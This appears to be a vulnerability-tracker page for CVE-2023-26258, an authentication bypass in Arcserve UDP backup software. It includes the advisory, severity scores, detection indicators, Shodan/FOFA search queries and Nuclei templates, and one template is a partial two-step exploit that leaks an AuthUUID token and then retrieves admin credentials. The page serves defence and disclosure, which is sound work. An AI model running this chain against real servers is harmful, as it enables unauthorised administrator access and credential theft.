CVE-2023-26258
published 2023-07-03CVE-2023-26258: Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token…
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
38.36%
98.4th percentile
Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arcserve | udp | <= 9.0.6034 | — |
Detection & IOCsextracted from sources · hover to see the quote
otherns5:authUUID
other([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})
otherhttp.favicon.hash:-1889244460
othericon_hash="-1889244460"
- →Detect exploitation attempt: HTTP POST to /WebServiceImpl/services/FlashServiceImpl with SOAPAction header to invoke getVersionInfo and leak the AuthUUID token.
- →Detect second-stage exploitation: HTTP POST to /WebServiceImpl/services/VirtualStandbyServiceImpl using the extracted AuthUUID to obtain a valid privileged session.
- →Successful AuthUUID leak is confirmed when the response body contains 'ns5:authUUID', HTTP 200, and Content-Type text/xml.
- →Successful session hijack is confirmed when the response body contains 'ns5:uuid', 'ns5:userName', and 'ns5:password' fields.
- →Identify Arcserve UDP web panels exposed on the internet using Shodan favicon hash -1889244460 or FOFA icon_hash query.
- →Arcserve UDP panel fingerprint: response body contains 'Arcserve UDP' or '/arcserve.js' with HTTP 200.
- ·The authentication bypass affects Arcserve UDP through version 9.0.6034; the vulnerability allows any unauthenticated user to escalate to administrator by chaining two SOAP endpoints. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wvxg-vj6j-j677: Arcserve UDP through 9
ghsa_unreviewed·2023-07-03
CVE-2023-26258 [CRITICAL] CWE-863 GHSA-wvxg-vj6j-j677: Arcserve UDP through 9
Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
VulnCheck
arcserve udp Incorrect Authorization
vulncheck·2023·CVSS 9.8
CVE-2023-26258 [CRITICAL] arcserve udp Incorrect Authorization
arcserve udp Incorrect Authorization
Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
Affected: arcserve udp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-08-19&host_type=src&vulnerability=cve-2023-26258; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-09-24&host_type=
No detection rules found.
Nuclei
ArcServe Panel - Detect
nuclei·CVSS 9.8
CVE-2023-26258 [CRITICAL] ArcServe Panel - Detect
ArcServe Panel - Detect
Template:
id: arcserve-panel
info:
name: ArcServe Panel - Detect
author: DhiyaneshDk
severity: info
reference:
- https://twitter.com/HunterMapping/status/1674267368359444480
- https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe
classification:
cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: arcserve
product: udp
shodan-query:
- http.favicon.hash:-1889244460
- http.favicon.hash:"-1889244460"
fofa-query: icon_hash="-1889244460"
tags: panel,login,arcserve,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Arcserve UDP"
- "/arcserve.js"
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022056ddb8d15fa05fb49a7ad6010cdb57010
Nuclei
Arcserve UDP <= 9.0.6034 - Authentication Bypass
nuclei·CVSS 9.8
CVE-2023-26258 [CRITICAL] Arcserve UDP <= 9.0.6034 - Authentication Bypass
Arcserve UDP
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains(body, "ns5:authUUID")'
condition: and
internal: true
extractors:
- type: regex
name: auth_uuid
group: 1
part: body
internal: true
regex:
- '([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})'
- raw:
- |
POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
{{auth_uuid}}
- |
POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains_all(body, "ns5:uuid", "ns5:userName", "ns5:password")'
condition: and
extractors:
- type:
No writeups or analysis indexed.
https://support.arcserve.com/s/article/KB000015720?language=en_UShttps://www.arcserve.com/products/arcserve-udphttps://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/https://support.arcserve.com/s/article/KB000015720?language=en_UShttps://www.arcserve.com/products/arcserve-udphttps://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
2023-07-03
Published
Exploited in the wild